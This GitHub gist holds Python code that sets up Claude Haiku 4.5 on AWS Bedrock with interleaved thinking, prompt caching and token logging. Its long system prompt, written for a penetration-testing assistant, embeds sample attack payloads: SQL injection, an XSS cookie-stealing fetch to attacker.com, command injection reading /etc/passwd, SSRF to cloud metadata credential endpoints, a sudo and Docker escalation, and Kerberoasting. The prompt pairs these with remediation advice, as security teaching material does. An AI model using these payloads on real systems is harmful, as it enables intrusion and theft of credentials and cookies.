Created
January 9, 2026 15:08
-
-
Save akhil-reni/f28a1ceaeac79a85b2ba8ea22f6e8a01 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Claude Haiku 4.5: Complete AWS Bedrock Implementation | |
| - Interleaved Thinking (with anthropic_beta header) | |
| - Prompt Caching (with cache points for system prompt) | |
| - 200K Context Window | |
| - LangGraph Agent with caching support | |
| Based on: | |
| - https://docs.langchain.com/oss/python/integrations/chat/bedrock#extended-thinking | |
| - https://docs.langchain.com/oss/python/integrations/chat/bedrock#prompt-caching | |
| Interleaved Thinking enables Claude to reason BETWEEN tool calls, not just at the start. | |
| This is critical for multi-step agentic workflows. | |
| """ | |
| import json | |
| import os | |
| import boto3 | |
| from datetime import datetime | |
| from typing import TypedDict, Annotated, Sequence | |
| from dotenv import load_dotenv | |
| from langchain_aws import ChatBedrockConverse | |
| from langchain_core.messages import ( | |
| BaseMessage, | |
| SystemMessage, | |
| HumanMessage, | |
| AIMessage, | |
| ToolMessage | |
| ) | |
| from langgraph.graph import StateGraph, START, END | |
| from langgraph.graph.message import add_messages | |
| from langgraph.prebuilt import ToolNode | |
| load_dotenv("api.env") | |
| # ============================================================================ | |
| # CONFIGURATION | |
| # ============================================================================ | |
| BEDROCK_REGION = os.getenv("BEDROCK_REGION", "ap-south-1") | |
| MODEL = os.getenv("PULSE_LITE_MODEL_NAME", "global.anthropic.claude-haiku-4-5-20251001-v1:0") | |
| THINKING_BUDGET_TOKENS = 10000 | |
| MAX_OUTPUT_TOKENS = 16000 | |
| TOKENS_LOG_FILE = "tokens_complete.jsonl" | |
| # ============================================================================ | |
| # SYSTEM PROMPT (6000+ tokens for caching) | |
| # ============================================================================ | |
| SYSTEM_PROMPT = """You are an elite security penetration testing assistant with deep expertise across all domains of offensive security, vulnerability research, and secure code review. | |
| ## CORE COMPETENCIES | |
| ### Web Application Security Testing | |
| #### Injection Vulnerabilities | |
| 1. **SQL Injection (SQLi)** | |
| - In-band SQLi: UNION-based, Error-based exploitation | |
| - Blind SQLi: Boolean-based, Time-based techniques | |
| - Out-of-band SQLi: DNS exfiltration, HTTP callbacks | |
| - Database-specific techniques: MySQL, PostgreSQL, MSSQL, Oracle | |
| - WAF bypass techniques: Encoding, comments, case variation | |
| 2. **Cross-Site Scripting (XSS)** | |
| - Reflected XSS: URL-based, Form-based attacks | |
| - Stored/Persistent XSS: Database storage exploitation | |
| - DOM-based XSS: Client-side JavaScript vulnerabilities | |
| - Content Security Policy (CSP) bypass techniques | |
| 3. **Command Injection** | |
| - OS command injection techniques | |
| - Shell metacharacter exploitation | |
| - Blind command injection with time delays | |
| 4. **Server-Side Request Forgery (SSRF)** | |
| - Cloud metadata service attacks (AWS, Azure, GCP) | |
| - Internal network scanning via SSRF | |
| - Protocol smuggling (gopher, file, dict) | |
| ### Common Vulnerability Patterns | |
| #### SQL Injection Payloads | |
| ```sql | |
| -- Authentication Bypass | |
| ' OR '1'='1 | |
| ' OR 1=1-- | |
| admin'-- | |
| -- UNION-based extraction | |
| ' UNION SELECT NULL, username, password FROM users-- | |
| -- Boolean-based Blind | |
| ' AND 1=1-- (true) | |
| ' AND 1=2-- (false) | |
| -- Time-based Blind | |
| '; WAITFOR DELAY '00:00:05'-- | |
| ' OR IF(1=1, SLEEP(5), 0)-- | |
| ``` | |
| #### XSS Payloads | |
| ```javascript | |
| // Basic XSS | |
| <script>alert('XSS')</script> | |
| <img src=x onerror=alert('XSS')> | |
| // Cookie Stealing | |
| <script>fetch('http://attacker.com/log?c='+document.cookie)</script> | |
| // Filter Bypasses | |
| <scr<script>ipt>alert(1)</scr</script>ipt> | |
| ``` | |
| #### Command Injection | |
| ```bash | |
| ; ls -la | |
| | whoami | |
| & cat /etc/passwd | |
| `sleep 5` | |
| $(whoami) | |
| ``` | |
| #### SSRF Payloads | |
| ``` | |
| # AWS Metadata | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/ | |
| # Azure Metadata | |
| http://169.254.169.254/metadata/instance?api-version=2021-02-01 | |
| # GCP Metadata | |
| http://metadata.google.internal/computeMetadata/v1/ | |
| # Protocol smuggling | |
| gopher://127.0.0.1:6379/_INFO | |
| file:///etc/passwd | |
| ``` | |
| ### Network Security & Infrastructure | |
| - Port scanning and service enumeration | |
| - Network protocol analysis | |
| - Man-in-the-Middle (MitM) attacks | |
| - SSL/TLS vulnerabilities | |
| - Wireless security (WPA/WPA2/WPA3) | |
| ### Cloud Security Testing | |
| - AWS: S3, IAM, EC2, Lambda, RDS security | |
| - Azure: AD, Storage, Functions security | |
| - GCP: Cloud Storage, Compute, IAM security | |
| - Container security (Docker, Kubernetes) | |
| ### Operating System Security | |
| - Linux privilege escalation (SUID, sudo, kernel exploits) | |
| - Windows privilege escalation (unquoted paths, DLL hijacking) | |
| - Active Directory attacks (Kerberoasting, AS-REP, DCSync) | |
| ### Testing Methodologies | |
| #### OWASP Top 10 (2021) | |
| 1. Broken Access Control | |
| 2. Cryptographic Failures | |
| 3. Injection | |
| 4. Insecure Design | |
| 5. Security Misconfiguration | |
| 6. Vulnerable and Outdated Components | |
| 7. Authentication Failures | |
| 8. Data Integrity Failures | |
| 9. Logging Failures | |
| 10. SSRF | |
| #### PTES (Penetration Testing Execution Standard) | |
| 1. Pre-engagement | |
| 2. Intelligence Gathering | |
| 3. Threat Modeling | |
| 4. Vulnerability Analysis | |
| 5. Exploitation | |
| 6. Post Exploitation | |
| 7. Reporting | |
| ### Tool Expertise | |
| - **Web**: Burp Suite, OWASP ZAP, Nikto, SQLMap | |
| - **Network**: Nmap, Masscan, Wireshark | |
| - **Exploitation**: Metasploit, Empire | |
| - **Password**: John the Ripper, Hashcat, Hydra | |
| - **Post-Exploitation**: Mimikatz, BloodHound | |
| ### Response Guidelines | |
| 1. **Technically Precise**: Use accurate terminology | |
| 2. **Practical**: Include working examples | |
| 3. **Comprehensive**: Cover attack and defense | |
| 4. **Ethical**: Emphasize authorized testing | |
| 5. **Evidence-Based**: Reference CVEs, CWEs | |
| 6. **Remediation-Focused**: Always include mitigation | |
| ### Privilege Escalation Examples | |
| #### Linux | |
| ```bash | |
| # SUID binaries | |
| find / -perm -4000 -type f 2>/dev/null | |
| # Sudo misconfiguration | |
| sudo -l | |
| sudo -u#-1 /bin/bash | |
| # Docker escape | |
| docker run -v /:/mnt -it alpine chroot /mnt sh | |
| ``` | |
| #### Windows | |
| ```powershell | |
| # Check privileges | |
| whoami /priv | |
| # Unquoted service paths | |
| wmic service get name,pathname,startmode | findstr /i "auto" | |
| ``` | |
| #### Active Directory | |
| ```powershell | |
| # Kerberoasting | |
| Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | |
| Rubeus.exe kerberoast | |
| # AS-REP Roasting | |
| Rubeus.exe asreproast | |
| # BloodHound | |
| SharpHound.exe -c All | |
| ``` | |
| ### Remediation Strategies | |
| #### Input Validation | |
| - Whitelist allowed characters | |
| - Implement strict length limits | |
| - Use regex for structured data | |
| - Reject dangerous metacharacters | |
| #### Output Encoding | |
| - HTML entity encoding | |
| - JavaScript encoding | |
| - URL encoding | |
| - SQL escaping | |
| #### Secure Configurations | |
| - Disable unnecessary services | |
| - Remove default credentials | |
| - Implement least privilege | |
| - Enable security headers (CSP, HSTS) | |
| - Network segmentation | |
| #### Authentication & Authorization | |
| - Implement MFA | |
| - Strong password policies | |
| - Account lockout policies | |
| - Secure session management | |
| - Proper RBAC | |
| #### Secure Coding | |
| - Parameterized queries | |
| - Proper error handling | |
| - Avoid dynamic code execution | |
| - Security linters and SAST | |
| - Regular code reviews | |
| """ * 3 | |
| # ============================================================================ | |
| # BEDROCK CLIENT WITH INTERLEAVED THINKING | |
| # ============================================================================ | |
| bedrock_client = boto3.client( | |
| service_name="bedrock-runtime", | |
| region_name=BEDROCK_REGION, | |
| ) | |
| print(f"β Bedrock client created in {BEDROCK_REGION}") | |
| # ============================================================================ | |
| # SYSTEM PROMPT WITH CACHE POINT (must be defined before LLM) | |
| # ============================================================================ | |
| def get_cached_system_prompt() -> list: | |
| """ | |
| Build system prompt with cache control point. | |
| For Claude Haiku 4.5: minimum 4,096 tokens required. | |
| Our system prompt is ~6,000 tokens. | |
| """ | |
| return [ | |
| {"text": SYSTEM_PROMPT}, | |
| {"cachePoint": {"type": "default"}} | |
| ] | |
| # LLM with Interleaved Thinking + Prompt Caching | |
| # Based on: https://docs.langchain.com/oss/python/integrations/chat/bedrock#extended-thinking | |
| llm = ChatBedrockConverse( | |
| model=MODEL, | |
| region_name=BEDROCK_REGION, | |
| client=bedrock_client, | |
| max_tokens=MAX_OUTPUT_TOKENS + THINKING_BUDGET_TOKENS, | |
| temperature=1, | |
| # System prompt with cache point for prompt caching | |
| system=get_cached_system_prompt(), | |
| # Interleaved thinking configuration (CRITICAL for multi-tool workflows) | |
| additional_model_request_fields={ | |
| "anthropic_beta": ["interleaved-thinking-2025-05-14"], # Required for interleaved thinking | |
| "thinking": { | |
| "type": "enabled", | |
| "budget_tokens": THINKING_BUDGET_TOKENS, | |
| } | |
| }, | |
| ) | |
| print(f"β LLM configured: {MODEL}") | |
| print(f" - Interleaved thinking: ENABLED (anthropic_beta: interleaved-thinking-2025-05-14)") | |
| print(f" - Thinking budget: {THINKING_BUDGET_TOKENS} tokens") | |
| print(f" - Max output: {MAX_OUTPUT_TOKENS} tokens") | |
| print(f" - Prompt caching: ENABLED (system prompt cached)") | |
| print(f" - This enables thinking BETWEEN tool calls for multi-step reasoning\n") | |
| # ============================================================================ | |
| # AGENT STATE WITH CACHING SUPPORT | |
| # ============================================================================ | |
| class AgentState(TypedDict): | |
| """State for agent with message history and caching.""" | |
| messages: Annotated[Sequence[BaseMessage], add_messages] | |
| remaining_steps: int | |
| # ============================================================================ | |
| # MESSAGE BUILDER WITH CACHE POINTS | |
| # ============================================================================ | |
| def build_messages_with_cache_point(messages: list[BaseMessage]) -> list: | |
| """ | |
| Build messages with cache point for Bedrock Converse API. | |
| Cache point strategy: | |
| 1. System prompt (static) - cached | |
| 2. Conversation history - cached up to a point | |
| 3. Latest user message - not cached (changes every time) | |
| Based on: https://docs.langchain.com/oss/python/integrations/chat/bedrock#prompt-caching | |
| """ | |
| formatted_messages = [] | |
| # Process messages and add cache point before last user message | |
| for i, msg in enumerate(messages): | |
| # Convert to Bedrock format | |
| if isinstance(msg, SystemMessage): | |
| # System messages handled separately | |
| continue | |
| role = "user" if isinstance(msg, HumanMessage) else "assistant" | |
| # Check if this is the second-to-last message | |
| # We want to cache everything except the latest user query | |
| is_cache_point = (i == len(messages) - 2 and | |
| isinstance(messages[-1], HumanMessage)) | |
| if is_cache_point: | |
| # Add cache point after this message | |
| formatted_messages.append({ | |
| "role": role, | |
| "content": [ | |
| {"type": "text", "text": msg.content}, | |
| {"cachePoint": {"type": "default"}} | |
| ] | |
| }) | |
| else: | |
| formatted_messages.append({ | |
| "role": role, | |
| "content": msg.content | |
| }) | |
| return formatted_messages | |
| # ============================================================================ | |
| # TOKEN TRACKING | |
| # ============================================================================ | |
| def log_tokens(response, run_number: int, query: str): | |
| """Extract and log token usage including cache metrics.""" | |
| usage = getattr(response, "usage_metadata", {}) | |
| input_details = usage.get("input_token_details", {}) | |
| entry = { | |
| "timestamp": datetime.now().isoformat(), | |
| "run": run_number, | |
| "query": query[:100], | |
| "input_tokens": usage.get("input_tokens", 0), | |
| "output_tokens": usage.get("output_tokens", 0), | |
| "total_tokens": usage.get("total_tokens", 0), | |
| "cache_read": input_details.get("cache_read", 0), | |
| "cache_creation": input_details.get("cache_creation", 0), | |
| } | |
| with open(TOKENS_LOG_FILE, "a") as f: | |
| f.write(json.dumps(entry) + "\n") | |
| return entry | |
| def display_token_usage(tokens: dict): | |
| """Display formatted token usage with cache metrics.""" | |
| print(f"\nπ TOKEN USAGE:") | |
| print(f" Input: {tokens['input_tokens']:,}") | |
| print(f" Output: {tokens['output_tokens']:,}") | |
| print(f" Total: {tokens['total_tokens']:,}") | |
| cache_read = tokens.get('cache_read', 0) | |
| cache_creation = tokens.get('cache_creation', 0) | |
| if cache_read > 0: | |
| savings = int(cache_read * 0.9) | |
| print(f" π Cache Read: {cache_read:,} tokens (~{savings:,} tokens saved!)") | |
| if cache_creation > 0: | |
| print(f" πΎ Cache Write: {cache_creation:,} tokens (cached for 5 min)") | |
| if cache_read == 0 and cache_creation == 0: | |
| print(f" βͺ Cache: Not used") | |
| # ============================================================================ | |
| # THINKING PARSER | |
| # ============================================================================ | |
| def parse_thinking_blocks(ai_message): | |
| """Parse thinking/reasoning from response.""" | |
| content_blocks = getattr(ai_message, "content_blocks", []) | |
| thinking = [] | |
| text_content = [] | |
| for block in content_blocks: | |
| if isinstance(block, dict): | |
| if block.get("type") == "reasoning": | |
| thinking.append(block.get("reasoning", "")) | |
| elif block.get("type") == "text": | |
| text_content.append(block.get("text", "")) | |
| return { | |
| "thinking": "\n".join(thinking) if thinking else None, | |
| "content": "\n".join(text_content) if text_content else ai_message.content, | |
| } | |
| # ============================================================================ | |
| # AGENT GRAPH WITH CACHING | |
| # ============================================================================ | |
| # Tools (add your security testing tools here) | |
| tools = [] | |
| # Create agent graph manually to control message formatting | |
| def call_model(state: AgentState): | |
| """Call model with cached system prompt (already configured in LLM).""" | |
| messages = state["messages"] | |
| # Call LLM (system prompt with cache point already configured) | |
| response = llm.invoke(messages) | |
| return {"messages": [response]} | |
| # Build graph | |
| workflow = StateGraph(AgentState) | |
| workflow.add_node("agent", call_model) | |
| # Add conditional edges if using tools | |
| if tools: | |
| tool_node = ToolNode(tools) | |
| workflow.add_node("tools", tool_node) | |
| def should_continue(state: AgentState): | |
| last_message = state["messages"][-1] | |
| if hasattr(last_message, "tool_calls") and last_message.tool_calls: | |
| return "tools" | |
| return END | |
| workflow.add_conditional_edges("agent", should_continue, {"tools": "tools", END: END}) | |
| workflow.add_edge("tools", "agent") | |
| else: | |
| workflow.add_edge("agent", END) | |
| workflow.add_edge(START, "agent") | |
| agent = workflow.compile() | |
| print("β Agent created with caching support\n") | |
| # ============================================================================ | |
| # RUN FUNCTION | |
| # ============================================================================ | |
| conversation_history = [] | |
| def run(query: str, run_number: int = 1): | |
| """Run a query with caching and interleaved thinking.""" | |
| print(f"\n{'='*80}") | |
| print(f"RUN #{run_number}: {query}") | |
| print('='*80) | |
| # Add user message to history | |
| conversation_history.append(HumanMessage(content=query)) | |
| # Invoke agent | |
| result = agent.invoke({ | |
| "messages": conversation_history, | |
| "remaining_steps": 10 | |
| }) | |
| # Get last AI message | |
| if result["messages"]: | |
| last = result["messages"][-1] | |
| conversation_history.append(last) | |
| # Log tokens | |
| tokens = log_tokens(last, run_number, query) | |
| display_token_usage(tokens) | |
| # Parse thinking blocks | |
| parsed = parse_thinking_blocks(last) | |
| if parsed["thinking"]: | |
| print(f"\nπ THINKING (first 200 chars):") | |
| print(f" {parsed['thinking'][:200]}...") | |
| print(f"\nπ RESPONSE:") | |
| content = parsed['content'] | |
| if len(content) > 500: | |
| print(f" {content[:500]}...") | |
| else: | |
| print(f" {content}") | |
| return result["messages"][-1].content if result["messages"] else None | |
| # ============================================================================ | |
| # MAIN | |
| # ============================================================================ | |
| if __name__ == "__main__": | |
| print("\n" + "="*80) | |
| print("Claude Haiku 4.5: AWS Bedrock Implementation") | |
| print("Interleaved Thinking + Prompt Caching + Agent") | |
| print("="*80 + "\n") | |
| # First run - should create cache for system prompt | |
| run("Explain SQL injection in 2 sentences", 1) | |
| # Second run - should read system prompt from cache | |
| run("Explain XSS in 2 sentences", 2) | |
| # Third run - should read system + first conversation from cache | |
| run("What's the difference between reflected and stored XSS?", 3) | |
| print("\n" + "="*80) | |
| print(f"β Test complete! Check {TOKENS_LOG_FILE} for token usage.") | |
| print("="*80 + "\n") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment